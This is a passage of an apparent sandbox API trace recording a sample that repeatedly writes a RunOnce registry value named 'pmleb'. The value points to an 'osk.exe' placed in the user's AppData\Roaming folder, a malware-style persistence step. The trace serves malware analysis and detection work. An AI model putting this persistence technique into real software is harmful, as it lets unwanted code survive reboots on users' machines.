HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.785] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x11 [0080.785] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.785] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.785] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.785] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.785] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.785] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.785] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.785] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.786] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.786] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.786] RegCloseKey (hKey=0x280) returned 0x0 [0080.786] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0080.786] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.786] SetTimer (hWnd=0x20280, nIDEvent=0x208d, uElapse=0xa, lpTimerFunc=0x0) returned 0x208d [0080.786] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.798] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.798] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.798] KillTimer (hWnd=0x20280, uIDEvent=0x208d) returned 1 [0080.798] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.798] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.799] IUnknown:Release (This=0x787518) returned 0x1 [0080.799] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.799] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.799] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), 
pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.799] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.799] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.799] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.799] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.799] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.799] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.799] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x12 [0080.799] FileSystemObject:IDispatch:GetIDsOfNames (in: 
This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.799] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x13 [0080.799] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.800] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x12 [0080.800] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.800] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.800] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.801] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.801] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.801] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) 
returned 61 [0080.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.801] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.801] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.801] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.801] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.801] RegCloseKey (hKey=0x280) returned 0x0 [0080.801] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.802] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.802] SetTimer (hWnd=0x20280, 
nIDEvent=0x208e, uElapse=0xa, lpTimerFunc=0x0) returned 0x208e [0080.802] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.814] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.814] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.814] KillTimer (hWnd=0x20280, uIDEvent=0x208e) returned 1 [0080.814] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.814] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.814] IUnknown:Release (This=0x787518) returned 0x1 [0080.815] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.815] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.815] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, 
bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.815] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.815] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.815] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.815] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.815] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.815] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.815] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x13 [0080.815] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), 
rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.815] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x14 [0080.815] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.816] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x13 [0080.816] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.816] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.816] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.816] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.817] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.817] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.817] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.817] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.817] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.817] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.817] RegCloseKey (hKey=0x280) returned 0x0 [0080.817] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.817] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.817] SetTimer (hWnd=0x20280, nIDEvent=0x208f, uElapse=0xa, lpTimerFunc=0x0) returned 0x208f [0080.818] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.829] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.829] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.829] KillTimer (hWnd=0x20280, uIDEvent=0x208f) returned 1 [0080.829] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.829] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.830] IUnknown:Release (This=0x787518) returned 0x1 [0080.830] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.830] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.830] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, 
pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.830] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.830] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.830] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.830] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.830] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.830] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.830] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x14 [0080.830] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: 
